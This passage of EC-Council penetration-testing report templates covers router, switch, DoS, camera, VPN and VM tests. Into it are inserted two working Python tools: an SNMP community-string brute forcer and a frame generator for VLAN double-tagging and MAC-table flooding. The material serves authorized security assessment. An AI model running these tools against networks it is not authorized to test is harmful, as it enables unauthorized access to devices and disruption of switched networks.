Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 7: Test for VTY/TTY connections

Target Organization
URL
IP Address of the Router Tested
Is the router console accessible over VTY/TTY lines? YES NO
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 8: Test for router running modes

Target Organization
URL
IP Address of the Router Tested
Modes: USER MODE / PRIVILEGE MODE
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 9: Test for SNMP capabilities

Target Organization
URL
IP Address of the Router Tested
SNMP Strings Used
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 10: Perform SNMP bruteforcing

Target Organization
URL
IP Address of the Router Tested
SNMP Community Strings
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:
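Added example for Tests 9 and 10 (editor-supplied, not part of the EC-Council template): an SNMPv1 community-string check that builds a GetRequest for sysDescr.0 (1.3.6.1.2.1.1.1.0) in raw BER, sends it with each candidate community, and treats any GetResponse carrying our request-id as proof the community is accepted, because v1/v2c agents silently drop requests with a wrong community. The target host and wordlist are placeholders; the GetResponse the demo parses is constructed locally with the same encoder.

```python
"""Added example (not part of the EC-Council template): raw SNMPv1 GetRequest
builder, GetResponse parser and community brute force for Tests 9 and 10.
Host and wordlist are placeholders; the demo reply is constructed.
"""
import socket

SYS_DESCR = "1.3.6.1.2.1.1.1.0"

def ber_len(n: int) -> bytes:
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def tlv(tag: int, payload: bytes) -> bytes:
    return bytes([tag]) + ber_len(len(payload)) + payload

def encode_int(n: int) -> bytes:
    return tlv(0x02, n.to_bytes((n.bit_length() + 8) // 8, "big", signed=True))

def encode_oid(oid: str) -> bytes:
    arcs = [int(a) for a in oid.split(".")]
    out = bytearray([arcs[0] * 40 + arcs[1]])
    for arc in arcs[2:]:                     # base-128, high bit = continuation
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append((arc & 0x7F) | 0x80)
            arc >>= 7
        out.extend(reversed(chunk))
    return bytes(out)

def build_pdu(pdu_tag, community, request_id, oid, value=b"\x05\x00"):
    """SNMPv1 message: SEQUENCE { version 0, community, PDU { reqid, 0, 0, varbinds } }."""
    varbind = tlv(0x30, tlv(0x06, encode_oid(oid)) + value)
    pdu = tlv(pdu_tag, encode_int(request_id) + encode_int(0) + encode_int(0) + tlv(0x30, varbind))
    return tlv(0x30, encode_int(0) + tlv(0x04, community.encode()) + pdu)

def build_get_request(community, oid, request_id):
    return build_pdu(0xA0, community, request_id, oid)

def build_get_response(community, request_id, oid, value: str):
    """Constructed GetResponse (what an agent sends) for offline testing."""
    return build_pdu(0xA2, community, request_id, oid, tlv(0x04, value.encode()))

def decode_tlv(data: bytes, pos: int = 0):
    tag, length, pos = data[pos], data[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(data[pos:pos + n], "big"), pos + n
    return tag, data[pos:pos + length], pos + length

def decode_seq(payload: bytes):
    items, pos = [], 0
    while pos < len(payload):
        tag, val, pos = decode_tlv(payload, pos)
        items.append((tag, val))
    return items

def decode_oid(raw: bytes) -> str:
    arcs, n = [raw[0] // 40, raw[0] % 40], 0
    for b in raw[1:]:
        n = (n << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(n)
            n = 0
    return ".".join(map(str, arcs))

def parse_get_response(data: bytes):
    """Return (request_id, error_status, community, [(oid, value)])."""
    tag, msg, _ = decode_tlv(data)
    (_, _ver), (_, community), (pdu_tag, pdu) = decode_seq(msg)
    if tag != 0x30 or pdu_tag != 0xA2:
        raise ValueError("not an SNMPv1 GetResponse")
    (_, reqid), (_, err), (_, _idx), (_, vbl) = decode_seq(pdu)
    varbinds = []
    for _, vb in decode_seq(vbl):
        (_, oid), (vtag, val) = decode_seq(vb)
        varbinds.append((decode_oid(oid), val.decode("latin-1") if vtag == 0x04 else val))
    return (int.from_bytes(reqid, "big", signed=True),
            int.from_bytes(err, "big", signed=True), community.decode(), varbinds)

def snmp_brute(host, wordlist, timeout=1.0):
    """[(community, sysDescr or None)] for every community the agent answers;
    the request-id check ties each reply to the community that was sent."""
    hits = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        for i, community in enumerate(wordlist, start=1):
            s.sendto(build_get_request(community, SYS_DESCR, i), (host, 161))
            try:
                data, _ = s.recvfrom(4096)
            except socket.timeout:
                continue
            reqid, err, _, varbinds = parse_get_response(data)
            if reqid == i:
                hits.append((community, varbinds[0][1] if err == 0 else None))
    return hits

if __name__ == "__main__":
    demo = build_get_response("public", 1, SYS_DESCR, "Cisco IOS Software, C2960 Software")
    print(parse_get_response(demo))
```

A community that answers a Get is read access at least; retry the hit with a SetRequest (tag 0xA3) on a harmless object to tell read-only from read-write, since the Test 10 row is only useful with that distinction.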


Test 11: Test for TFTP connections

Target Organization
URL
IP Address of the Router Tested
TFTP Allowed YES NO
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 12: Test if finger is running on the router

Target Organization
URL
IP Address of the Router Tested
Finger Service Running YES NO
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 13: Test for CDP protocol running on the router

Target Organization
URL
IP Address of the Router Tested
CDP Protocol Running YES NO
CDP Messages
1. Device ID (hostname)
2. Port ID (port information about the sender)
3. Operating system platform
4. IOS software version being used
5. Capabilities of the router
6. Network IP address
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 14: Test for NTP protocol

Target Organization
URL
IP Address of the Router Tested
NTP Protocol Running YES NO
Router Synchronized YES NO
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 15: Test for access to router console port

Target Organization
URL
IP Address of the Router Tested
Is physical console access possible? YES NO
Console access on the router is password protected YES NO
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 16: Test for loose and strict source routing

Target Organization
URL
IP Address of the Router Tested
Routing: Loose Source Routing / Strict Source Routing
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 17: Test for IP spoofing

Target Organization
URL
IP Address of the Router Tested
IP Spoofing Possible YES NO
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 18: Test for handling bugs

Target Organization
URL
IP Address of the Router Tested
Test Successful YES NO
ACLs Used on the Router YES NO
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 19: Test ARP attacks

Target Organization
URL
IP Address of the Router Tested
ARP Spoofing Is Possible Against the Router YES NO
Victim IP Address
Victim MAC Address
Poisoned IP Address
Poisoned MAC Address
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 20: Test for routing protocol assessment

Target Organization
URL
IP Address of the Router Tested
Weak Authentication Present YES NO
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 21: RIP testing

Target Organization
URL
IP Address of the Router Tested
RIP v1 Authentication:
RIP v2 Authentication:
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 22: Test for OSPF protocol

Target Organization
URL
IP Address of the Router Tested
OSPF Protocol Present    Authentication:
Misconfigured?           Authentication:
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 23: Test BGP protocol

Target Organization
URL
IP Address of the Router Tested
BGP Protocol Present YES NO
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 24: Test for EIGRP protocol

Target Organization
URL
IP Address of the Router Tested
EIGRP Protocol Present YES NO
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 25: Test router denial-of-service attacks

Target Organization
URL
IP Address of the Router Tested
Malformed Packet Attack YES NO
Packet Flood Attacks YES NO
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 26: Test the router's HTTP capabilities

Target Organization
URL
IP Address of the Router Tested
Port Used to Connect
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 27: Test through HSRP attack

Target Organization
URL
IP Address of the Router Tested
HSRP Group Forwarded to IP Address YES NO
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Switch Penetration Testing

Test 1: Test address cache size

Target Organization
URL
Frame size relayed
Address Cache Size
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 2: Data integrity and error checking test

Target Organization
URL
Frame Size
Traffic Rate
Data Pattern
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 3: Testing for back-to-back frame capacity

Target Organization
URL
Number of Frames Sent at Once
Inter-frame Gaps
Number of Frames Forwarded by the Switch
Number of Test Reruns
Capacity Detected
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 4: Testing for frame loss

Target Organization
URL
Count of Frames Transmitted
Frame Loss Equation
Measurement
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 5: Testing for latency

Target Organization
URL
Method used
Latency detected
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 6: Testing for throughput

Target Organization
URL
Count of Frames
Rate of the Offered Stream
Throughput
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 7: Test for frame error filtering

Target Organization
URL
Frame Size
Illegal frame types
Traffic Rate
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 8: Fully meshed test

Target Organization
URL
Frame Size
Traffic Rate
Traffic Data Type
DUT setup
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 9: Stateless QoS functional test

Target Organization
URL
Frame size
Duration
Traffic Rate
DUT-QoS
DUT-Line speed
DUT-QoS type
DUT-QoS Policies
DUT-Queue type
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 10: Spanning tree network convergence performance test

Target Organization
URL
Test ports
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 11: OSPF performance test

Target Organization
URL
Frame Size
Traffic Rate
OSPF Parameters
DUT setup
DUT OSPF Area
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 12: Test for VLAN hopping

Target Organization
URL
Dynamic Trunking Protocol (DTP)
DTP States
DTP Negotiation
VLAN Hopping
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 13: Test for MAC table flooding

Target Organization
URL
Content Addressable Memory (CAM) Table
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:
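Added example for Tests 12 and 13 (editor-supplied, not part of the EC-Council template): crafting the 802.1Q frames those two switch tests send. build_frame() stacks tags for the double-tagging form of VLAN hopping, where the outer tag matches the trunk's native VLAN and is stripped before the inner tag is honoured; mac_flood_frames() yields a stream of frames from fresh locally administered source MACs so each one costs the switch a CAM entry; parse_tags() reads the tags back for verification. Sending needs a Linux AF_PACKET raw socket and CAP_NET_RAW; the interface name, VLAN ids and addresses are placeholders.

```python
"""Added example (not part of the EC-Council template): 802.1Q frame crafting
for the VLAN hopping (Test 12) and MAC table flooding (Test 13) checks.
Interface, VLAN ids and addresses are placeholders.
"""
import os
import socket
import struct

ETH_P_8021Q = 0x8100
ETH_P_IP = 0x0800

def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))

def fmt_mac(mac: bytes) -> str:
    return ":".join("%02x" % b for b in mac)

def build_frame(dst, src, vlans, ethertype=ETH_P_IP, payload=b"", priority=0):
    """Ethernet II frame with zero or more stacked 802.1Q tags. For hopping,
    vlans=[native_vlan, target_vlan]: the first switch strips the outer tag
    (native VLAN is sent untagged on the trunk) and forwards the inner-tagged
    frame, which the next switch delivers into target_vlan."""
    hdr = mac_bytes(dst) + mac_bytes(src)
    for vid in vlans:
        if not 0 <= vid < 4096:
            raise ValueError("VLAN id out of range")
        tci = (priority << 13) | vid                 # PCP(3) DEI(1) VID(12)
        hdr += struct.pack("!HH", ETH_P_8021Q, tci)
    return hdr + struct.pack("!H", ethertype) + payload

def parse_tags(frame: bytes):
    """Return (dst, src, [vlan ids], ethertype, payload)."""
    dst, src = frame[:6], frame[6:12]
    pos, vlans = 12, []
    while struct.unpack_from("!H", frame, pos)[0] == ETH_P_8021Q:
        tci = struct.unpack_from("!H", frame, pos + 2)[0]
        vlans.append(tci & 0x0FFF)
        pos += 4
    ethertype = struct.unpack_from("!H", frame, pos)[0]
    return fmt_mac(dst), fmt_mac(src), vlans, ethertype, frame[pos + 2:]

def random_unicast_mac() -> str:
    """Locally administered unicast address: bit0 clear, bit1 set in octet 0."""
    b = bytearray(os.urandom(6))
    b[0] = (b[0] & 0xFE) | 0x02
    return fmt_mac(bytes(b))

def mac_flood_frames(count: int, dst="ff:ff:ff:ff:ff:ff", vlan=None):
    """Yield `count` minimal frames, each from a fresh source MAC; the switch
    learns one CAM entry per frame until the table is full and it floods."""
    tags = [vlan] if vlan is not None else []
    for _ in range(count):
        yield build_frame(dst, random_unicast_mac(), tags, payload=b"\x00" * 46)

def send_frames(iface: str, frames):
    """Transmit raw frames (Linux, CAP_NET_RAW). Not called by the demo."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((iface, 0))
        for f in frames:
            s.send(f)

if __name__ == "__main__":
    hop = build_frame("ff:ff:ff:ff:ff:ff", "02:00:00:00:00:01", [1, 20], payload=b"hopping")
    print(parse_tags(hop))
    print(sum(1 for _ in mac_flood_frames(1000)), "flood frames generated")
```

Double-tagging only works one way (the reply has no path back), so the Test 12 check is whether a listener in the target VLAN sees the payload; for Test 13, watch for the switch starting to flood unicast traffic to your port once the CAM table fills, and note that port security limits on the access port stop it.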


Test 14: Testing for ARP attack

Target Organization
URL
MAC address
IP address
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 15: Check for VTP attack

Target Organization
URL
Command Output: Cat2950#show vtp status
VTP Version
Configuration Revision
Maximum VLANs Supported Locally
Number of Existing VLANs
VTP Operating Mode
VTP Domain Name
VTP Pruning Mode
VTP V2 Mode
VTP Traps Generation
MD5 Digest
Configuration Last Modified By
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 16: Automated tool scan of the switch

Target Organization
URL
Scanned Status for 1.
Network Devices 2.
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

EC-Council Licensed Penetration Tester

Methodology: Denial-of-Service Penetration Testing

Penetration Tester:
Organization:
Date: Location:

Confidential 1 Template DoSPT/19

Test 1: Test heavy loads on the server

Target Organization
URL
Server IP Address Tested
Impact of the Test
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 2: Check for DoS vulnerable systems

Target Organization
URL
Server IP Address
tested
Impact of the test
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 3: Run SYN attack on the server

Target Organization
URL
Server IP Address
tested
Impact of the test
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 4: Run port flooding attacks on the server

Target Organization
URL
Server IP Address
tested
Impact of the Test
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 5: Run IP fragmentation attack on the server

Target Organization
URL
Server IP Address
tested
Impact of the Test
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 6: Run ping of death

Target Organization
URL
Server IP Address
tested
Impact of the test
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 7: Run teardrop attack

Target Organization
URL
Server IP Address
tested
Impact of the test
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 8: Run smurf (ping flooding or ICMP storm) attack

Target Organization
URL
Server IP Address
tested
Impact of the test
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 9: Run email bomber on the email servers

Target Organization
URL
Server IP Address
tested
Impact of the test
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 10: Flood the website forms and guestbook with bogus entries

Target Organization
URL
Server IP Address
tested
Impact of the test
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 11: Run service request floods

Target Organization
URL
Server IP Address
Tested
Service Requests
Containing Large
Payloads
Impact of the Test
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 12: Run permanent DoS attacks

Target Organization
URL
Server IP Address
Tested
Social Engineering
Techniques used to
Post the Fraudulent
Links
Impact of the Test
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 13: Run peer-to-peer attacks

Target Organization
URL
Server IP Address
Tested
Unpatched DC++
(direct connect) Hubs
Non-vulnerable DC++
(direct connect) Hubs
IP Addresses to Block
and Exploit DC++
Hubs
Impact of the Test
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 14: Test for SQL wildcard injection attacks

Target Organization
URL
Server IP Address
Tested
Wildcards used to
exhaust CPU
resources
Query Execution
Time in the Database
Server
HTTP Log Files for
Response Time of
the Query
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 15: Try to log in to customer accounts

Target Organization
URL
Logging Mechanism
of the Host
Applications
User Account Locked YES NO
Number of Failed
Login Attempts
Access User Database using a Brute-Forcing Technique YES NO
Logic Behind
Machine-Generated
User Names
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 16: Test for buffer overflow attacks that result in denial of service

Target Organization
URL
Server IP Address
Tested
Overwrite Memory
Fragments
Arbitrary Code
Executed on the
Target Server
Code Executed to
cause Segmentation
Fault
Code Executed to
cause Memory Dump
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 17: Test for DoS user-specified object allocation

Target Organization
URL
Server IP Address
Tested
User-Specified
Number of Objects
Allocated to the
Client's Server
Automated Script to
Exhaust Resources of
E-Commerce Sites
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 18: Test for user input as a loop counter

Target Organization
URL
Applications Loop through a Code Segment that Exhausts Computing Resources YES NO
Places Located
where Input Values
Exhaust Server
Resources

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 19: Try to generate large application log files

Target Organization
URL
Server IP Address
Tested
Data Validation
Method Records the
Failed Value
Upper Limit of Log
Dimensions and
Maximum Allocated
Space for each Log
Entry to Perform an
Attack on
Application Logs
Application Log Files Record Overly Large Requests Sent to the Host Server without any Limitation of the Length YES NO
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 20: Test for memory allocation in applications

Target Organization
URL
Server IP Address
Tested
Applications Properly Release Resources after they are Used YES NO
Special Characters
used to Create Errors
in Applications and
Consume Memory
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 21: Try to store too much data in sessions

Target Organization
URL
Server IP Address
Tested
Target Memory
Usage
Automated Scripts
sent to Create New
Sessions on the
Server
Blocks of Data are Recorded in a Cache YES NO
Blocks of Data are Recorded in Database for User Sessions YES NO
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Methodology: Surveillance Camera Penetration Testing

Penetration Tester:
Organization:
Date: Location:

Confidential 1 Template SPT/23



Test 1: Check the type of surveillance equipment used

Target Organization
URL
Type of Surveillance Camera Used in the Organization
Bullet Camera PC-Based Surveillance System
IP Camera All-in-One Camera Systems
Board Cameras Others
Depending on the type of surveillance camera, which of the following is used, and is it required by the organization?
Hidden Cameras:

Closed Circuit Television (CCTV) Systems:

Low-Light Surveillance:

Long-Range Surveillance:

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 2: Check whether cameras are deployed in critical areas

Target Organization
URL
Surveillance Equipment is Mounted in Critical Areas YES NO
Provides Required Area Coverage YES NO
Audio Recording Enabled YES NO
Desired Footage Tone YES NO
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 3: Check the video transmission medium

Target Organization
URL
Video Transmission 1.
Medium for Various 2.
Types of Security
Cameras 3.
4.
5.

Components of the 1.
Surveillance System 2.
used as Effective
Means of Video 3.
Transmission 4.
5.

Connectivity of the Video Recording Signal in Activated Mode YES NO


Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 4: Attempt tampering with the wire/wireless connectivity to the cameras

Target Organization
URL
Possibility of Tampering with the Wire/Wireless Connectivity to the Cameras YES NO
Camera Resolution 1.
and the Range with 2.
Usage of Different
Lenses 3.

Weatherproofing 1.
Measures Taken to 2.
Protect the Wireless
Equipment 3.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 5: Check the bandwidth available for the surveillance cameras

Target Organization
URL
Amount of
Bandwidth Used by
Network Surveillance
Cameras
Factors on which the 1.
Bandwidth 2.
Requirement of a
Surveillance System 3.
Depends
Dedicated Bandwidth Available for the Surveillance System YES NO
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 6: Check the settings of the monitoring computer

Target Organization
URL
Efficiency of the
Security Camera
Monitor
Type of Security Camera Monitor Used
Set-up Camera System or Main Monitor Spot Monitor

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 7: Check video footage clarity

Target Organization
URL
Lighting and
Resolution of the
Footage
Image Quality Meets Minimum Legal and Policy Requirements YES NO
Distance Between the Camera Fixed to the Wall or Ceiling is Proportionate to the Clarity of the Image YES NO
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 8: Attempt changing video formats

Target Organization
URL
Results of Video
Formats Testing
Commonly Used
Video Formats
Security Surveillance Cameras Used are Supported by Certain Commonly Used Video Formats YES NO
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 9: Scan for suspicious device drivers in the monitoring computer

Target Organization
URL
Scan Results for 1.
Devices Used to 2.
Monitor Video
Surveillance Cameras 3.
for Suspicious 4.
Drivers
5.

Noticed Drivers 1.
Interfere with the 2.
Working of DVR
Systems 3.

Device Drivers being Used are Genuine YES NO


Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 10: Check the video viewing options

Target Organization
URL
Video Viewing
Options
Controls in the Main 1.
Screen 2.
3.

Things to be Focused 1.
on to Get the Best 2.
Images and Video
Recordings on the 3.
Security Camera 4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 11: Identify the possible threats while integrating video with other systems

Target Organization
URL
Identified Possible Threats while Integrating Video with Other Systems
Hardware Threats:

Electrical Threats:

Environmental Threats:

Maintenance Threats:

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 12: Check if the footage storage duration meets the organization's requirements

Target Organization
URL
Organization making Valid Usage of Information Obtained from Surveillance Camera Footage YES NO
Factors that 1.
Determine Whether 2.
to Store Bulky Data
or Video Footage 3.
Straight to the Hard 4.
Disks
5.

Analysis of the Type of Video Storage Used
1.
2.
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 13: Check the optimization of DVR/NVR storage

Target Organization
URL
Features Included in Video Management System to Store Optimized Data for Security
1. 6.
2. 7.
3. 8.
4. 9.
5. 10.
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 14: Check network settings of the DVR/NVR system

Target Organization
URL
Basic Steps to Check the Configuration of the DVR Network and a Computer with Remote Viewer Software
1.
2.
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 15: Check if all connections are working properly

Target Organization
URL
Devices Checked 1.
2.
3.
4.
5.

List of the Devices Not Working Properly
1.
2.
3.
4.
5.

Results Analysis:


Test 16: Check who has local and remote access to the DVR/NVR

Target Organization
URL
Determined Local
and Remote Access
to DVR/NVR Systems
through Surveillance
Policy
Analysis of DVR/NVR
Access Logs
Detected
Unauthorized
Attempt to Access
DVR/NVR Systems
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 17: Scan the organization's network range to detect DVR systems

Target Organization
URL
Detected DVR
Systems
Scan Results of the
Organization's
Network Range
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 18: Check if access to the DVR/NVR is protected

Target Organization
URL
Access to the DVR System is Protected YES NO
Type of Access Control Mechanisms Used
Physical Security System Access

Strong Password Used for Administration True False


Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 19: Try cracking DVR/NVR access passwords

Target Organization
URL
Target IP Address
Protocol Used
Attempt to Crack the
DVR/NVR Access
Password
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Methodology: VPN Penetration Testing

Penetration Tester:
Organization:
Date: Location:

Confidential 1 Template VPNPT/25



Test 1: Check the target organization's VPN security policy

Target Organization
URL
VPN Security Policy Enforced YES NO
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 2.1: Scanning - 500 UDP IPsec

Target Organization
URL
Target URL
State of the UDP Port 500 Open Closed
ISAKMP Service (IPsec VPN Server) is Running on Port 500 Yes No
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 2.2: Scanning - 1723 TCP PPTP

Target Organization
URL
Target URL
State of the TCP Port 1723 Open Closed
PPTP Service is Running on Port 1723 Yes No
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 2.3: Scanning - 443 TCP/SSL

Target Organization
URL
Target URL
State of the TCP Port 443 Open Closed
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 2.4: Scanning - Ipsecscan xxx.xxx.xxx.xxx-255

Target Organization
URL
Single IP Address
Scan
Range of IP
Addresses Scanned
IPSEC Enabled
Systems
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 3: Fingerprinting

Target Organization
URL
VPN Vulnerabilities 1.
Detected 2.
3.

Information 1.
Gathered through 2.
Fingerprinting
3.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 3.1: Get the IKE handshake

Target Organization
URL
Host URL
Acceptable 1.
Transform Attributes 2.
from the Security
Association (SA) 3.
Payload
Combinations of 1.
Transform Attributes 2.
Tried
3.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 3.2: UDP Backoff fingerprinting

Target Organization
URL
Host URL
Implementation 1.
Guess 2.
3.

Information 1.
Gathered 2.
3.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 3.3: Vendor ID fingerprinting

Target Organization
URL
Vendor ID Payload 1.
2.
3.

Other Information 1.
Gathered 2.
3.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 3.4: Check for IKE aggressive mode

Target Organization
URL
Host URL
Aggressive Mode Enabled YES NO
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 4: Test for default user accounts and passwords

Target Organization
URL
IPSEC VPN: Default User Accounts and Passwords
User Accounts Passwords
1. 1.
2. 2.
3. 3.
4. 4.
5. 5.
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 5: Check for unencrypted user name in a file or the registry

Target Organization
URL
Password File or
Registry Entry
Successfully Recovered Passwords YES NO
Recovered 1.
Passwords 2.
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 6: Test for plain-text password

Target Organization
URL
VPN Client Established to Obtain the Password YES NO
Plain-text Password
Recovered
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 7: Perform user name enumeration

Target Organization
URL
Response Given by 1.
the VPN Endpoint to 2.
an Authentication
Attempt 3.

List of Valid 1.
Usernames 2.
3.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 8: Check account lockout in VPN

Target Organization
URL
Connection to VPN Tunnel Using Correct User Name and False Password
Threshold defined by the authentication
system for failed login attempts
Amount of time required to reset user
account credentials
Impact of the Test 1.
2.
3.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 9: Audit VPN traffic

Target Organization
URL
Sniffing Techniques
Used to Intercept
VPN Traffic
Traffic Intercepted
Before it Passes the
Tunnel
Traffic Intercepted
After it Passes the
Tunnel
Decrypt Traffic Off the Line Successful Unsuccessful
Recover Sensitive 1.
Information 2.
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 10: Check for proper firewalling in VPN

Target Organization
URL
Open Ports in the Firewall
1. 4.
2. 5.
3. 6.
Packets Passed 1.
through TCP and 2.
UDP Filtering in the
Firewall 3.

Results from 1.
examined Firewall 2.
Logs
3.
4.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 11: Check for denial of service in VPN

Target Organization
URL
Router Effect on the 1.
VPN Under DoS 2.
Attack
3.

Effect on the VPN due to Shared Part of the Network under DoS Attack
1.
2.
3.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Methodology: Virtual Machine Penetration Testing

Penetration Tester:
Organization:
Date: Location:

Confidential 1 Template VMPT/26



Test 1: Scan for virtual environments

Target Organization
URL
Host Machine
Detected Virtual
Environments
Services Created on 1.
Specific Ports by 2.
Virtual Platforms
3.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 2: Search for virtual environments

Target Organization
URL
Discovered Virtual
Environments
List of Computers, 1.
Routers, and Servers 2.
discovered Using
Variety of Filters 3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 3: Check if a documented policy exists for creating new virtual machines

Target Organization
URL
Host Machine
Documented Policy Available to Create New Virtual Machines YES NO
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 4: Create inventory of virtual machines

Target Organization
URL
Host Machine
Inventory (List of All Virtual Machines)
Online VMs Offline VMs Rogue VMs

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 5: Check patch status of host and guest operating systems

Target Organization
URL
Patch Status of Host
Operating Systems
Patch Status of Guest
Operating Systems
List all Unpatched 1.
Host and Guest 2.
Operating Systems
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 6: Check VM configuration for unused emulated hardware

Target Organization
URL
Analyzed VM
Configuration
Settings
List of All Unused 1.
Emulated Hardware 2.
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 7: Check IP addressing information on virtual NICs

Target Organization
URL
Host Operating
System
